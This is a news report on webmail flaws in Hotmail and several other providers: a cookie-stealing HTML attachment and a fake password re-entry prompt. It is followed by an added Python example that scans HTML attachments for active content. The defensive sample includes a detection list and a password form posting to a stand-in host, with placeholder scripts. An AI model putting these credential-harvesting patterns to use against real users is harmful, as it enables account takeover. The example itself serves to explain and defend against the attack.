A number of free e-mail providers were rushing Wednesday to repair a rash of security holes.
Microsoft Corp. Wednesday quickly patched a security hole in its free Web-based e-mail service, Hotmail.
“The fix is up and has been implemented on all of the hotmail servers,” a Microsoft spokesperson said Wednesday afternoon. “To our knowledge, no users were affected. We did disable the Hotmail servers for a short time this morning.”
Bug hunter Bennett Haselton, Webmaster for anti-content filtering advocacy organization Peacefire, discovered the flaw, which could allow a hacker to break into an e-mail account using an e-mail message with an attached HTML file.
“When the user views the attached HTML file, their cookies in the Hotmail.MSN.com domain are intercepted and sent to a hostile site; since the cookies are used for authentication, whoever receives them can then log into Hotmail as that user,” Haselton wrote in his description of the exploit. A full description of the exploit is available here.
The exploit uses a JavaScript Trojan horse to intercept the cookie. Hotmail filters JavaScript in e-mail messages but does not filter it in HTML attachments.
Hotmail, owned by Microsoft Corp., is often a target for hackers due to its more than 50 million accounts.
Haselton also discovered a separate exploit late Tuesday that could fool other Web-based e-mail sites into handing over passwords through a false but convincing password-entry screen.
Yahoo!, Excite@Home and USA.net were found to be vulnerable to the exploit. Microsoft’s Hotmail — a perennial target due to its more than 50 million accounts — was found not to be vulnerable. Hotmail’s HTML e-mail “filter” was already designed to detect an attack of this nature.
Yahoo! Mail safeguarded users from the exploit rapidly, fixing the security hole in about an hour. Excite@Home and USA.net also implemented fixes not long after the security hole was discovered.
Fully described here, the exploit brings up a window, “Session timeout: Please re-enter your password,” when a user clicks “Reply” or “Delete” after reading a hacker’s message. When the password is re-entered, it is sent to a hostile site. The user sees nothing unusual.
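Both holes come down to the same filtering gap the article describes: active content (script, event handlers, javascript: URLs, forms that can imitate a login prompt) was stripped from the message body but not from HTML attachments, so the attachment ran with the webmail site's cookies. The following is an added illustration, not Hotmail's or any provider's actual filter code, of why a body-only policy misses the attack and how a policy that scans every HTML part closes it. The message structure, the sample attachment and the list of flagged elements are all constructed for this example.

```python
from html.parser import HTMLParser

# Constructed policy for this example: elements that can run script or present
# a form, and attributes that can carry a javascript: URL.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "form"}
URL_ATTRS = {"href", "src", "action"}


class ActiveContentScanner(HTMLParser):
    """Records anything in an HTML document that could execute script or
    solicit input in the webmail origin: script-like elements, on* event
    handlers and javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} of <{tag}>")


def scan_html(html):
    """Return a list of active-content findings for one HTML document."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def filter_body_only(message):
    """The flawed policy the article describes: only the message body is scanned,
    so an HTML attachment reaches the browser untouched."""
    return scan_html(message["body"])


def filter_body_and_attachments(message):
    """Corrected policy: every HTML part of the message is scanned, attachments
    included, so the attachment can no longer run script in the mail origin."""
    findings = list(scan_html(message["body"]))
    for att in message["attachments"]:
        if att["content_type"] in ("text/html", "application/xhtml+xml"):
            findings += [f"{att['filename']}: {f}" for f in scan_html(att["content"])]
    return findings


# Constructed sample: a clean body plus an HTML attachment containing the kinds
# of active content the two exploits relied on (placeholder script bodies only).
SAMPLE_MESSAGE = {
    "body": "<p>Hi, please see the attached page.</p>",
    "attachments": [
        {
            "filename": "page.html",
            "content_type": "text/html",
            "content": (
                "<html><body>"
                "<script>/* constructed placeholder: runs with the site's cookies */</script>"
                '<img src="x.gif" onload="/* constructed placeholder */">'
                '<a href="javascript:void(0)">link</a>'
                '<form action="http://example.invalid/collect">'
                '<input type="password" name="pw"></form>'
                "</body></html>"
            ),
        }
    ],
}

if __name__ == "__main__":
    print("body-only policy flags:", filter_body_only(SAMPLE_MESSAGE))
    print("body+attachments policy flags:", filter_body_and_attachments(SAMPLE_MESSAGE))
```

Run stand-alone, the body-only policy reports nothing for the sample message while the corrected policy reports the script element, the onload handler, the javascript: URL and the form in `page.html`. A real deployment would reject or rewrite such parts rather than only list them, and would serve attachments from a separate origin so that even a missed script could not read the mail site's cookies.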